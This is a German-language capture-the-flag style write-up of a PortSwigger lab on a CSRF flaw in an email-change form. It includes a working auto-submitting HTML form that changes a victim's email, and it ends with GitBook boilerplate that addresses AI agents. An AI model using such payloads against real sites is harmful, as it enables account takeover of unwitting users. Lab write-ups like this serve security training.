> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/csrf/csrf-vulnerability-with-no-defenses.md).

# CSRF-Schwachstelle ohne Schutz

### CSRF-Schwachstelle ohne Schutzmaßnahmen

#### Beschreibung

Die E-Mail-Änderungsfunktion dieses Labs ist anfällig für einen CSRF-Angriff. Das Ziel ist es, eine clientseitige Anfrage zu fälschen, die die E-Mail-Adresse des Opfers ohne dessen Zustimmung ändert.

#### Ziel

Erstellen Sie HTML-Inhalt, der den CSRF-Angriff ausführt, um die E-Mail-Adresse des Besuchers zu ändern, und laden Sie diesen Inhalt dann auf Ihren Exploit-Server hoch.

#### Kennung

Sie können sich mit dem folgenden Konto anmelden:/ **wiener: peter**

<figure><img src="/files/24ba8901b4ba638a1abf5035dd1d9cbc61f6b205" alt=""><figcaption></figcaption></figure>

Beim Abfangen ist zu sehen, dass die Anfrage zum Ändern der E-Mail eine einfache POST-Anfrage ist, die den `E-Mail` Parameter akzeptiert. Es gibt keinen Anti-CSRF-Schutz (kein Token, kein Origin usw.), was es ermöglicht, das Senden des Formulars von einer auf dem Exploit-Server gehosteten Seite aus zu automatisieren.

#### Auf dem Exploit-Server zu hinterlegendes Payload-HTML

Das folgende HTML erstellt ein Formular, das auf die URL zur Änderung der E-Mail abzielt, und sendet es automatisch ab, wenn die Seite geladen wird:

```html
<form class="login-form" name="change-email-form" action="https://0a8500d803454f6280a003f700b700a3.web-security-academy.net/my-account/change-email" method="POST">
    <input required="" type="email" name="email" value="admin@hacked.com">
</form>

<script>
   document.forms[0].submit();
</script>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/csrf/csrf-vulnerability-with-no-defenses.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
